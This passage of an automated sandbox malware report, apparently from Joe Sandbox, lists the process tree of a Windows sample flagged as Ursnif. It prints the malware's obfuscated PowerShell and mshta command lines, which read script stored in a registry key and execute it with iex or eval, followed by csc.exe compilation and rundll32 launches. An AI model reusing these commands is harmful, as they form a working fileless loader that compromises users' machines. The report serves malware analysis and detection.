                  Imagebase:0x7ff7f20f0000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  General

                  Start time:11:50:45
                  Start date:19/01/2022
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name viccxg -value gp; new-alias -name qooxkryog -value iex; qooxkryog ([System.Text.Encoding]::ASCII.GetString((viccxg "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                  Imagebase:0x7ff777fc0000
                  File size:447488 bytes
                  MD5 hash:95000560239032BC68B4C2FDFCDEF913
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Yara matches:
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001F.00000003.438121484.0000014B5DD8C000.00000004.00000040.sdmp, Author: Joe Security

                  General

                  Start time:11:50:46
                  Start date:19/01/2022
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff7f20f0000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  General

                  Start time:11:50:48
                  Start date:19/01/2022
                  Path:C:\Windows\System32\mshta.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ltid='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ltid).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                  Imagebase:0x7ff76e720000
                  File size:14848 bytes
                  MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: SUSP_LNK_SuspiciousCommands, Description: Detects LNK file with suspicious content, Source: 00000021.00000002.386067444.00000121EDC9B000.00000004.00000001.sdmp, Author: Florian Roth

                  General

                  Start time:11:50:50
                  Start date:19/01/2022
                  Path:C:\Windows\System32\mshta.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Tlot='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Tlot).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                  Imagebase:0x7ff76e720000
                  File size:14848 bytes
                  MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  General

                  Start time:11:50:51
                  Start date:19/01/2022
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name einkftwfr -value gp; new-alias -name ulhulxq -value iex; ulhulxq ([System.Text.Encoding]::ASCII.GetString((einkftwfr "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                  Imagebase:0x7ff777fc0000
                  File size:447488 bytes
                  MD5 hash:95000560239032BC68B4C2FDFCDEF913
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET

                  General

                  Start time:11:50:51
                  Start date:19/01/2022
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff7f20f0000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  General

                  Start time:11:50:53
                  Start date:19/01/2022
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name einkftwfr -value gp; new-alias -name ulhulxq -value iex; ulhulxq ([System.Text.Encoding]::ASCII.GetString((einkftwfr "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                  Imagebase:0x7ff777fc0000
                  File size:447488 bytes
                  MD5 hash:95000560239032BC68B4C2FDFCDEF913
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET

                  General

                  Start time:11:50:53
                  Start date:19/01/2022
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff7f20f0000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  General

                  Start time:11:51:00
                  Start date:19/01/2022
                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eutk2hxp\eutk2hxp.cmdline
                  Imagebase:0x7ff66e020000
                  File size:2739304 bytes
                  MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET

                  General

                  Start time:11:51:01
                  Start date:19/01/2022
                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5nzflxas\5nzflxas.cmdline
                  Imagebase:0x7ff66e020000
                  File size:2739304 bytes
                  MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET

                  General

                  Start time:11:51:01
                  Start date:19/01/2022
                  Path:C:\Windows\System32\control.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\control.exe -h
                  Imagebase:0x7ff691270000
                  File size:117760 bytes
                  MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  General

                  Start time:11:51:02
                  Start date:19/01/2022
                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fyriofhk\fyriofhk.cmdline
                  Imagebase:0x7ff66e020000
                  File size:2739304 bytes
                  MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET

                  General

                  Start time:11:51:03
                  Start date:19/01/2022
                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4702.tmp" "c:\Users\user\AppData\Local\Temp\eutk2hxp\CSC3C520F3552234BD5981E8C2C19975E5B.TMP"
                  Imagebase:0x7ff721ff0000
                  File size:47280 bytes
                  MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  General

                  Start time:11:51:04
                  Start date:19/01/2022
                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yycrjy0w\yycrjy0w.cmdline
                  Imagebase:0x7ff66e020000
                  File size:2739304 bytes
                  MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET

                  General

                  Start time:11:51:04
                  Start date:19/01/2022
                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES49B1.tmp" "c:\Users\user\AppData\Local\Temp\5nzflxas\CSCCA0D8D115C84DA1A0293F6BF85846.TMP"
                  Imagebase:0x7ff721ff0000
                  File size:47280 bytes
                  MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  General

                  Start time:11:51:05
                  Start date:19/01/2022
                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4D3C.tmp" "c:\Users\user\AppData\Local\Temp\fyriofhk\CSC7F089C7BD9A5426483691E56FD9DB0F7.TMP"
                  Imagebase:0x7ff721ff0000
                  File size:47280 bytes
                  MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  General

                  Start time:11:51:06
                  Start date:19/01/2022
                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES522D.tmp" "c:\Users\user\AppData\Local\Temp\yycrjy0w\CSCDAC2BC21A294475B86B2FDF784B11415.TMP"
                  Imagebase:0x7ff721ff0000
                  File size:47280 bytes
                  MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  General

                  Start time:11:51:06
                  Start date:19/01/2022
                  Path:C:\Windows\System32\control.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\control.exe -h
                  Imagebase:0x7ff691270000
                  File size:117760 bytes
                  MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  General

                  Start time:11:51:07
                  Start date:19/01/2022
                  Path:C:\Windows\System32\rundll32.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
                  Imagebase:0x7ff700140000
                  File size:69632 bytes
                  MD5 hash:73C519F050C20580F8A62C849D49215A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  General

                  Start time:11:51:09
                  Start date:19/01/2022
                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\babtdr3v\babtdr3v.cmdline
                  Imagebase:0x7ff71aa50000
                  File size:2739304 bytes
                  MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET

                  General

                  Start time:11:51:10
                  Start date:19/01/2022
                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\11mxocay\11mxocay.cmdline
                  Imagebase:0x7ff66e020000
                  File size:2739304 bytes
                  MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET

                  General

                  Start time:11:51:11
                  Start date:19/01/2022
                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mrf10rqm\mrf10rqm.cmdline
                  Imagebase:0x7ff66e020000
                  File size:2739304 bytes
                  MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET

                  Disassembly

                  Code Analysis
